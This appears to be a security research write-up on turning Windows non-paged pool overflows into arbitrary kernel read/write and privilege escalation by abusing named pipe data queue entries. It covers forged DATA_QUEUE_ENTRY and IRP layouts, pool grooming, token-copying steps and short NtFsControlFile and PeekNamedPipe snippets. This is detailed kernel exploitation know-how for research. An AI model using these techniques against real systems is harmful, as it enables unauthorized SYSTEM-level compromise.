- Table of Contents
- Introduction
- Named-Pipes Introduction
- Exploitation
- Future work
- References
In this document we provide a series of techniques that can be used to exploit overflows in the non-paged pool on Windows. The techniques (ab)use the functionalities provided by the named pipe file system (npfs) to turn the overflow into arbitrary read/write and escalate privileges.
The following table shows the exploitability coverage provided by the present document over different overflow categories, which is based on the level of control over the:
- Overflow data. In other words, is the overflow composed by user data or "random" data? e.g.
memcpy(vulnerable_chunk, user_controlled_data, overflow_size)
vsmemset(vulnerable_chunk, 0, overflow_size)
- Overflow size.
memcpy(vulnerable_chunk, input_buffer, user_controlled_size)
vsmemcpy(vulnerable_chunk, input_buffer, random_size)
Overflow Size Control | No Overflow Size Control | |
---|---|---|
Overflow Data Control | ✔ | ✔ |
No Overflow Data Control | ✔ | ✓ |
Previously documented techniques on the topic fell primarily under the category "Overflow Data Control && Overflow Size Control" and the goal of this research was to expand that coverage. This research was triggered after seeing the Project Zero analysis on CVE-2020-17087 mentioning the use of named pipes to establish arbitrary write, a primitive that was not documented (at the time).
For further discussion on the table above, see the "Approaching Different Pool Overflow Categories" chapter. Now we will get into the concepts related to named pipes that would allow us to build the exploitation primitives.
Named pipes are an inter-process communication mechanism that allows two processes potentially belonging to different computers to share data. A brief description of its operations (for more information see [1]), a named pipe connection has the server end, which creates the pipe, and the client end, which connects to that pipe. When a named-pipe connection is established, the underlying driver creates two queues, one for each end, within the Context Control Block (CCB). The CCB, in the context of the npfs, is an undocumented structure used to hold information about a particular server/client connection. Those queues found within the CCB store entries that are primarily related to data written by "the other" end or pending read operations by the current end. The structure used for the queue entries is the following:
struct DATA_QUEUE_ENTRY {
LIST_ENTRY NextEntry;
_IRP* Irp;
_SECURITY_CLIENT_CONTEXT* SecurityContext;
uint32_t EntryType;
uint32_t QuotaInEntry;
uint32_t DataSize;
uint32_t x;
char Data[];
}
Note: this is an undocumented structure, some information was obtained through ReactOS
An overview of the fields above and some of the mechanisms implemented by npfs:
NextEntry: used to create a doubly linked list with all the queued data entries. Entries are primarily related to read and write operations. One way of creating write operation entries is through the WriteFile API call and those entries are removed from the list when all of their data are read by a client (e.g. using the ReadFile). The list includes a sentinel node, which is stored within the CCB of the named pipe.
SecurityContext:
nt!_SECURITY_CLIENT_CONTEXT
+0x000 SecurityQos : _SECURITY_QUALITY_OF_SERVICE
+0x010 ClientToken : Ptr64 Void
+0x018 DirectlyAccessClientToken : UChar
+0x019 DirectAccessEffectiveOnly : UChar
+0x01a ServerIsRemote : UChar
+0x01c ClientTokenControl : _TOKEN_CONTROL
This field enables the server end of a named pipe to impersonate the security context of a client. An overview of how it works:
- The client writes some data to the server queue.
- A DATA_QUEUE_ENTRY is created and its SecurityContext is populated with the current security context of the client
- Steps (1),(2) can be repeated, each time capturing the security context of the client
- After the server attempts to perform a read operation (and if there was no previous file system control request with code 0x110044, see below), the SecurityContext of the current entry will be stored in the CCB of the named pipe connection. Interestingly, this step is also performed in the peek operation.
The server can then call the ImpersonateNamedPipeClient
which will attempt to impersonate the security context stored in the CCB after step (4)
It is noted that npfs exposes two file system operations related to impersonation.
- fsctl code=0x11001C (FSCTL_PIPE_IMPERSONATE): this is the operation called with ImpersonateNamedPipeClient. The underlying code appears to be an inlined-optimized version of a call to NpImpersonate with specific arguments through which it attempts to impersonate the security context stored in the Ccb.
- fsctl code=0x110044 (unknown): calls the NpImpersonate directly with specific arguments that cause the impersonation functionality to be permanently disabled for the given np connection. So step (4) above only works if there was no previous call to this operation.
EntryType: Data entries can have different types which change the way data in the structure are treated. Two important types are buffered and unbuffered entries.
Buffered Entries:
The DATA_QUEUE_ENTRY allocated is big enough to hold the actual data of the request. Buffered entries are subject to the quota management mechanism which we will see later on and can be created through the regular WriteFile API call.
Unbuffered Entries:
The DATA_QUEUE_ENTRY allocated is big enough to hold the header without the data. The Irp related to the request is linked to the entry and references the actual data of the request. One way to create unbuffered entries is by calling the NpInternalWrite (fsctl code: 0x119FF8).
Irp: the IRP associated with the DATA_QUEUE_ENTRY. Two of the cases where this field is populated are:
a) When we have unbuffered entries
b) When a buffered entry is created with its size exceeding the available pipe quota.
QuotaInEntry: This is a field used to denote the quota consumed by the particular entry. For unbuffered entries is 0. In buffered entries, it starts with the DataSize and decreases with every read until its value is dropped to 0.
DataSize: This is the length of the user data associated with the current DATA_QUEUE_ENTRY
x: this field is uninitialized in the entry creation, probably used for padding
Quota management mechanism: allows the server-end of the communication channel to specify the maximum size of data the queues can hold. When that limit is exceeded:
- In blocking mode (PIPE_WAIT) the entry is created with QuotaInEntry set to the number of bytes available in the current queue. Then, after every read (not peek) operation on a buffered entry, the read size gets added to the QuotaInEntry of the stalled write. When the QuotaInEntry becomes equal to the DataSize, that signals that there is enough space to hold that entry in the pipe's quota and its associated irp gets completed and removed from the current data entry.
- In non-blocking mode (PIPE_NOWAIT), the operation will fail. (the number of written bytes will be equal to 0)
In the past, Alex Ionescu has documented in a blogpost[2] the use of buffered entries to spray the non-paged pool. Another simple way of spraying the non-paged pool is through the use of unbuffered entries. As we have seen before, unbuffered entries allow memory allocation with complete control over both the size and the data (e.g. no DATA_QUEUE_ENTRY headers). The fact that we have full control over the data make unbuffered entries more suitable for some cases since:
- They can be used to forge data structures with complete precision (e.g. when exploiting UAF issues)
- The operation that involves a forged data structure might have to free the object at the end of its procedure. If our forged structure is not aligned at the beginning of a pool chunk, it will cause a bug check in most allocators (probably all allocators except LFH) during the free procedure.
The following code can be used to create unbuffered entries:
//create the pipe/file in FILE_FLAG_OVERLAPPED mode (blocking mode)
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x119FF8, buf, sz, 0, 0);
It is noted that unbuffered entries are created mainly through the NpInternal*
functions and it's not certain whether those functionalities are meant to be exposed to userspace code. For example, NpInternalTransceive
doesn't permit direct calls from userspace programs.
- Establish an arbitrary read by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge an unbuffered entry. This technique was first documented by Corentin Bayet and Paul Fariello in [3]. It is noted that this was also the first research documenting the use of named pipes to establish a read primitive and exploit a pool overflow.
The forged entry would look like this:
DATA_QUEUE_ENTRY:
NextEntry=whatever;
Irp=Forged IRP Address;
SecurityContext=ideally 0;
EntryType=1;
QuotaInEntry=ideally 0;
DataSize=arbitrary read size;
x=whatever;
IRP->SystemBuffer = arbitrary read address
For convenience, we can set the Irp to a userspace address (and in the absence of SMAP), but that's not our only option.
-
Disclose the memory adjacent to the overflown chunk by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge a buffered entry with DataSize bigger than the original value. This technique appears to be first documented by @scwuaptx through a HITCON CTF challenge [4].
This technique can be used to leak pointers/heap metadata and other interesting data that could be found/placed after our DATA_QUEUE_ENTRY.
To make this work, the forged DATA_QUEUE_ENTRY should look like this:
DATA_QUEUE_ENTRY: NextEntry=whatever; Irp=ideally 0; SecurityContext=ideally 0; EntryType=0; QuotaInEntry=ideally 0; //mostly irrelevent in case we use the peek operation DataSize=something bigger than the original size; x=whatever;
There are some cases where we might have a limited set of characters in our disposal to overflow the memory with (e.g. RtlZeroMemory(buffer, bufferlen+1)
). In those cases, we can overflow the Flink of a DATA_QUEUE_ENTRY and make it point to a location where we have full control over the data. We can then use the techniques previously described to establish the memory reads. In most supported 64 bit architectures we have to be careful to craft canonical addresses. When this is taken under consideration and assuming little endian architecture, one easy way to redirect the Flink to a controlled location is to overwrite the first couple of bytes, since that will make the DATA_QUEUE_ENTRY point to a memory location near the current entry. Then with proper heap grooming, we make that location contain the forged DATA_QUEUE_ENTRY for relative/arbitrary memory reads.
This technique is illustrated below:
In this diagram, we see that the victim entry was originally pointing to the cover entry. After the overflow, its Flink got redirected and now points to the undercover DATA_QUEUE_ENTRY which is composed by user controlled data. We then use the memory disclosure technique described before to leak the data of "chunk 2". It is noted that there are cases where the babushka entry could end up being the same as the cover entry like for example in the poc provided for vuln_driver_al20c
After getting the layout above, what's left is to read DataSize+DataSize1-sizeof(DATA_QUEUE_ENTRY)+n
after which we will be able to read n
bytes from "chunk 2". The DataSize2 should be at least DataSize1-sizeof(DATA_QUEUE_ENTRY)+n
In practice, there is one more challenge before using this technique. After Windows 7, Microsoft implemented safe-unlinking in the LIST_ENTRY members. Based on that, after reading DataSize bytes, the overflown DATA_QUEUE_ENTRY will get removed from the queue and the Flink/Blink will be validated, which in our case will trigger a bug check (entry->Flink->Blink!=entry
). Fortunately, we can perform a "read-only" operation on the pipe queue through the use of PeekNamedPipe
and work around this issue.
So a practical approach to what we discussed here is:
- Groom the pool memory to ensure the overwritten Flink (i.e. cover entry address) will be displaced to a memory location containing the undercover DATA_QUEUE_ENTRY. The undercover data entry will facilitate a relative memory disclosure. The Flink of the undercover data entry should point to a memory location which the user can modify, like for example a userspace address.
- Overflow the Flink of the victim entry.
- Use PeekNamedPipe with size<DataSize+DataSize2 to activate the undercover DATA_QUEUE_ENTRY and leak adjacent pool memory. Goal here is to leak some interesting pointers and bypass ASLR. A data entry is a perfect fit for our purpose.
- Modify the contents of the specified userspace address to hold a forged DATA_QUEUE_ENTRY that facilitates the arbitrary read. Use PeekNamedPipe with
size=DataSize+DataSize2+n
to leak n bytes from the address set in the SystenBuffer of the IRP. - Repeat steps (3) or (4) as deemed necessary
The approach discussed here is illustrated below:
Similarly with arbitrary read, establishing any sort of write primitive using named pipes became more difficult with the hardened LIST_ENTRY operations. On Windows 7 for example, it is possible to write a kernel address (queue sentinel node in Ccb) to an arbitrary location. We could have done it by forging a DATA_QUEUE_ENTRY, with its Flink set to the target address and then reading the whole data entry. That would cause the data entry to get unlinked from the list which would cause the execution of dqe->Flink->Blink=dqe->Blink
. As a target address we could have potentially used the size field of a suitable gdi object.
Post-Windows 7, we have to follow a different strategy. Here we assume that we have already established the relative/arbitrary read primitive suggested in "Limited control over the overflow data" chapter. So the plan is to abuse the quota management mechanism we discussed earlier on to forge a DATA_QUEUE_ENTRY that simulates a stalled write, through which we forge an IRP that would establish the arbitrary write upon its completion.
Now the biggest challenge is forging a valid IRP that would allow us to establish the arbitrary write upon completion. Since IRP is a complicated structure and is legitimately processed by the kernel (i.e. IofCompleteRequest) and not the npfs which was the case in the Arbitrary Read technique, we have to be precise. The simplest way i found to achieve that was to create a data entry that contains an IRP, use the arbitrary read to read that IRP, modify the IRP so as it would perform the arbitrary write upon completion and create an unbuffered entry* to hold that forged IRP. Finally, with the forged IRP in place, we just make some room in the queue by reading some data and we should be able to cause the completion of our forged IRP and thus establish the arbitrary write.
*: It's important to use an unbuffered entry to hold the forged IRP since it will most likely get deallocated by the end of the call to IofCompleteRequest.
For reference, the code related to the collection of soon to be completed IRPs can be found at the end of NpReadDataQueue in the inlined version of NpCompleteStalledWrites.
The simulated stalled DATA_QUEUE_ENTRY and forged IRP could look like this:
DATA_QUEUE_ENTRY:
NextEntry.Flink=accessible address;
Irp=Forged IRP Address;
SecurityContext=ideally 0;
EntryType=0;
QuotaInEntry=DataSize-1;
DataSize=arbitrary write size;
x=whatever;
Forged IRP:
Flags=Flags&~IRP_DEALLOCATE_BUFFER|IRP_BUFFERED_IO|IRP_INPUT_OPERATION;
AssociatedIrp=Source Address;
UserBuffer=Destination Address;
ThreadListEntry.Flink->Blink==ThreadListEntry.Blink->Flink==&ForgedIRPAddr->ThreadListEntry;
To summarize:
- Spray the memory with data queue entries
- Use the steps laid out in the "Limited control over the overflow data" section to establish the relative/arbitrary read
- After step (1), it's likely that an adjacent chunk that can be reached through our relative read will hold a data entry. Identify that chunk and its handle (e.g. unique identifier in the Userdata or bruteforce), and find its address (dqe->Flink->Blink). In some cases, instead of identifying the handle of the "next" chunk, it might be easier to identify the address of the victim pipe. For example we find the address of the next_chunk (dqe->Flink->Blink) and then calculate the addresses of the previous/following chunks and try to identify the victim entry. (for example in the poc for CVE-2020-17087 we know that victim_entry->Flink%0x10000==0x0020)
- Create a data entry on the identified handle that will have an IRP. I have tested this with buffered entry while on exceeded pipe quota but it should also work for unbuffered entries.
- The new entry should be added to the data queue next to the leaked entry. Use the arbitrary read to find the address of the newly created entry (leaked_entry->Flink), its IRP address and finally the IRP data.
- Modify the IRP to enable the arbitrary write as shown above. For example in the pocs, the Source Address is set to the system process token and Destination Address is set to the current process token. It is noted that we can easily identify the aforementioned addresses through the IRP found at step (5) and its associated thread information.
- Read 1 byte to trigger the arbitrary write. Note: it should be possible to set the QuotaInEntry to DataSize and trigger the completion of the irp with zero read length to a FSCTL_PIPE_INTERNAL_READ_OVFLOW operation on the pipe.
This could be an alternative to arbitrary write for escalating privileges. As we have already seen, after each read operation on a data entry there will be an attempt to determine whether the current SecurityContext should be stored in the current Ccb or not. What's interesting for our purpose is the fact that in case the SecurityContext field of the DATA_QUEUE_ENTRY is populated, there would be a call to the NpFreeClientSecurityContext with argument one of the following two:
- the SecurityContext stored DATA_QUEUE_ENTRY in case the client impersonation is disabled as described in the intro.
- the SecurityContext stored in the Ccb in case impersonation is enabled. Essentially clean up the old context before replacing it with the new one.
For reference, the code segment inside NpReadDataQueue where this functionality is implemented is shown below:
The option (1) appears to be more more straightforward since it frees the security context found in the current entry instead of the previous one, but any of the two should be usable.
So a high-level overview of how this could potentially be exploited is to forge a SECURITY_CLIENT_CONTEXT structure that is impersonable by the server, holds elevated privileges but doesn't require special permissions to impersonate (e.g. see the remarks).
Steps:
- The steps at the beginning should be similar to the arbitrary write process. first, we establish the relative/arbitrary read, leak irp data, find current thread/process and potentially other elevated tokens that would enable us to construct that special token that is impersonable without permissions.
- Find the pipe handle and the address of an entry that is different from the one used to establish the read/free primitive. Let's call it pipe_handle_client/pipe_handle_server.
- Create n entries writing into the pipe_handle_client
- Start from the last entry and read its SecurityContext using the arbitrary read
- Trigger the arbitrary free on the address acquired in step (4)
- Spray unbuffered entries with the forged SECURITY_CLIENT_CONTEXT created in (1)
- Use the arbitrary read to verify whether we managed to replace the memory pointed by the stored SecurityClient context in (4) with the forged SECURITY_CLIENT_CONTEXT
- If that fails, go to the previous data entry (Blink) and repeat step (4). Entries for which we were unable to allocate our forged SCC should be considered corrupted and an attempt to read from them will most likely trigger a BSOD. That's why we start from the end of the list and move backward, we have n tries to allocate the forged structure.
- Read all the entries in pipe_handle_server until at least one byte is read from the overwritten SecurityContext (no more than its DataSize). At that point, the ClientContext with the forged data should already be copied to the Ccb of the pipe.
- Call ImpersonateNamedPipeClient on the pipe_handle_server
In the limited time spent testing this, i was able to attach a forged token to a thread, but the forged _TOKEN structure had some inconsistencies that needed fixing (e.g. integrity checks and fields pointing at absolute addresses within the token itself). Nevertheless, with some effort it should be possible to escalate using this technique.
Now we will have an overview of how the discussed techniques could be used in different overflow scenarios. Let's revisit the table we've seen in the introduction:
Overflow Size Control | No Overflow Size Control | |
---|---|---|
Overflow Data Control | ✔ | ✔ |
No Overflow Data Control | ✔ | ✓ |
-
Data Control && Size Control
All of the techniques discussed here should be applicable.
-
Data Control && No Size Control
The exploitation of the overflows in this category should be similar to the overflows found in "No Data Control && No Size Control" which is described below. The only difference is that we have control over the overflow data and as such we can avoid the problem of corrupted pipes. For example, as overflow data we can repeatedly use an address under our control (e.g. userspace virtual address) that holds a forged data entry. (e.g.
overflow_data=struct.pack("<Q", userspace_address)*overflow_size/8+victim_entry_flink_bytes
). The goal is to make the "padding memory" data entries look like this:DATA_QUEUE_ENTRY: NextEntry=userspace_address; Irp=userspace_address; SecurityContext=userspace_address; EntryType=userspace_address; QuotaInEntry=userspace_address; DataSize=userspace_address; x=userspace_address;
Based on the implementation of the function NpReadDataQueueEntry, which is used for the read operations, data entries with EntryType values bigger than one are skipped safely (i.e. NextEntry is used) when a peek operation is performed. So we can use the peek operation to identify the victim_entry, since the "padding memory" entries would use the forged data entry in the
userspace_address
in contrast to the victim entry that would use the forged entry specified in the redirected Flink. -
No Data Control && Size Control
Here we should be able to use the techniques related to the Flink overflow in the "Limited control over the overflow data".
-
No Data Control && No Size Control
This should be the most challenging overflow category to exploit. Its exploitability will be heavily dependent on the specifics of the underlying case. Let's say we have an overflow caused by something like this:
memset(vulnerable_chunk, 0, overflow_size)
The diagram below illustrates our initial state:
Since we have no control over the overflow data, we can try to plug the technique described over the "Limited control over the overflow data". The goal now is to place a DATA_QUEUE_ENTRY near the end of the overflown area and attempt to have its Flink partially overflown (ideally 1-2 bytes)
This approach is illustrated below:
As we can see in the diagram, it might be necessary to have a padding memory between the vulnerable chunk and victim entry to have the victim entry properly aligned for the overflow.
The size of padding memory required really depends on the vulnerable_chunk size and the overflow_size. Based on these, we have two possibilities:
i. No padding memory is required. In this case we can proceed normally with the rest of the steps to establish the read/write primitives. An example of this case is provided in the vulnerable_driver, where we essentially deal with an off-by-one overflow.
ii. Padding memory is needed. This is normally the case when overflow_size-vulnerable_chunk_size>usable_overflow_size+userlying_pool_header_size
To better understand when this situation might come up, let's briefly go through CVE-2020-17087, since it's one case where padding memory is required.
The parameters of the overflow are the following:
vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
memset(vulnerable_chunk, 0x30, user_controlled_size*6); //not the same, but mostly equivalent
In this case we can have the following overflow parameters:
user_controlled_size = 0x2ae3;
vulnerable_chunk_size = (0x2ae3*6)%65536 = 0x152;
vulnerable_chunk = AllocateMemory(0x152); //it falls into the 0x170 LFH bucket
memset(vulnerable_chunk, 0x30, 0x10152);
To exploit this issue with the Flink overflow technique, the following memory layout is required:
So, we have a usable_overflow_size=1-4
, which is the number of bytes needed to use our technique and overflow the Flink, but the overflow is way beyond that: 0x10152-0x170
bytes. The bytes beyond those used for the Flink overflow represent the padding memory.
Now to make things work, we have to have control over the allocations in the padding memory before the overlflow. That's because we don't want any operations performed within that memory after the overflow, since everything is going to be overwritten (e.g. corrupted pool allocator metadata, data structures, etc). Some options for dealing with the padding memory:
a. In case we are in medium integrity, if possible spray the memory with objects the address of which we can leak (e.g. NtQuerySystemInformation) and make sure we have the appropriate pool layout before triggering the overflow.
b. In low-integrity, we use data entries to fill that memory. The biggest challenge here is the identification of the victim entry after the overflow. After the overflow, the state we are left with includes is a bunch of corrupted data entries (the entries that fill the padding memory) and only one valid entry (victim entry). In this situation, we have a problem that derives from the fact that the pool chunk allocation order does not always translate to the order the chunks are placed into memory (e.g. chunkB is allocated after chunkA, but it might be placed before chunkA in memory). For example, this is the expected behavior when the LFH services the victim chunk size. In addition, operations performed on the corrupted entries should lead to a BSOD.
Given the above, we can't always know/calculate where the victim_entry handle is. Unfortunately, I couldn't identify a solid solution to this problem. Nevertheless, since this capability would allow us to have a universal set of techniques that would work on virtually any non-paged pool overflow situation, I have dedicated the chapter "Identifying Corrupted Pipes" to discuss the topic in more depth.
Now in case the victim chunk size is not serviced by the LFH or we can guarantee somehow the creation order=>memory allocation order, then one way to identify the victim chunk would be to traverse the victim entries in reverse creation order until we identify the victim entry. It is noted that this was the strategy used in the CVE-2020-17087 poc where the victim size was picked so as it was serviced by the Variable Size (VS) allocator.
In some cases, it's useful to have the ability to identify pipes with corrupted data entries. For example, when the overflow is caused by an integer overflow and we have the victim entry fall within the range of the Low Fragmentation Heap.
So we are now in the state shown in the diagram, we have the victim entry whose headers have been rewritten to facilitate the read/write primitive, but several data entries have been corrupted in the process. The problem here is that we normally don't know which pipe handle corresponds to the valid victim entry. One way to find it is to iterate over all the pipe handles and perform an operation that would verify that we are dealing with the victim entry (e.g. read operation that leaks next chunk data). In our instance, this is not a great approach as most operations on corrupted entries (e.g. read) will most likely cause a momentary change in the background image (i.e. cause BSOD). So we want to skip over them.
Two approaches to achieve that could be:
- Extract some of the headers of the data entry itself and validate their values. In practice, using the peek operation, we can extract the DataSize field as shown below:
PeekNamedPipe(pipe_handle, buf, 0, 0, 0, &remaining);
//remaining=FirstEntry->DataSize-alreadyRead
//so if remaining=="AAAAAAAAAA" it's most likely corrupted
- Find a functionality in npfs that can work through a corrupted data entry, and its control flow/responses depend on the DATA_QUEUE_ENTRY headers. For example, by calling the operation that corresponds to the code
0x116000
(FSCTL_PIPE_INTERNAL_READ_OVFLOW) with read length equal to 0, the NpReadDataQueue will follow different code paths based on the value of the EntryType. If the EntryType is greater than 1, then theisb.Status
will be equal to 0 otherwise it will be 0x80000005 (note, there is also a semi-reliable timing channel that allows us to determine which path was taken):
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x116000, buf, 0, buf, 0);
//isb.Status==0?"corrupted":"good" (assuming the overflow written something different to 0,1)
On the downside, there is a limitation with the examples provided above: they only work for pipes created with the PIPE_TYPE_MESSAGE flag. This is not ideal since in practice we are not able to use the Peek operation to go pass the first data entry and utilize the specially crafted Flink to activate our forged data entries (i.e. the approach used in "Limited control over the overflow data").
This behavior of the peek operation is a bit counter-intuitive (maybe a bug?) since the read mode of the operation is normally based on the read mode of the pipe and not its type mode. This is actually true for the ReadFile (i.e. uses read mode) but not for the peek operation (uses the type mode). In the documentation of PeekNamedPipe we see an attempt to explain this behavior (i.e. "The data is read in the mode specified with CreateNamedPipe. For example, create a pipe with PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE. If you change the mode to PIPE_READMODE_BYTE with SetNamedPipeHandleState, ReadFile will read in byte mode, but PeekNamedPipe will continue to read in message mode"). The problem is that this behavior remains even when the pipe is opened with "PIPE_TYPE_MESSAGE | PIPE_READMODE_BYTE", which doesn't appear to be conforming with the documentation.
Other than spraying and forging data structures, unbuffered entries can also be used to leak the overflown data. This is true, since their chunks in memory are composed 100% by the user data, so there is no risk of corruption after the overflow (the pool header, if exists, it would still be corrupted). So after the overflow, the unbuffered entry will be filled with the overflow data which we should be able to read afterwards.
Potential use-cases:
- Leak potentially valuable information (e.g. interesting addresses)
- If we control the overflow data, then that could be used potentially to determine some information about the LFH state (or not)
- Let's say we are targeting the Low Fragmentation Heap (LFH) and we have the problem previously described with identifying corrupted pipes. We know that a subsegment can hold
x
objects of a target size and we also assume that subsegments are allocated sequentially. So we allocate2*x
unbuffered entries and1
buffered. We repeatedly induce the overflow (prerequisite is a reliable way of inducing the vulnerability) until the overflow hits one of the buffered entries. We then go sequentially with the allocation order through our pipes, read their contents and find the last unbuffered overflown entry (overflown_unbuffered_entry_index). The buffered entry allocated within the range of:overflown_unbuffered_entry_index-x to overflown_unbuffered_entry_index+x
should be thevictim_entry
- Maybe some other more practical usecases:)
- Find a way to identify corrupted pipes in PIPE_TYPE_BYTE mode (should be a difficult task) or try to have Microsoft fix the important bug mentioned in "Identifying Corrupted Pipes"! (probably even more difficult task). This would allow us to earn the final ✔ for the category "No Data Control && No Size Control".
- It should be interesting to escalate privileges through the SECURITY_CLIENT_CONTEXT approach. (challenging but should be feasible)
- https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes
- Alex Ionescu. "Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool". https://www.alex-ionescu.com/?p=231
- Corentin Bayet and Paul Fariello. "Scoop the Windows 10 pool!". https://github.com/synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion
- @scwuaptx. https://github.com/scwuaptx/CTF/tree/master/2020-writeup/hitcon/lucifer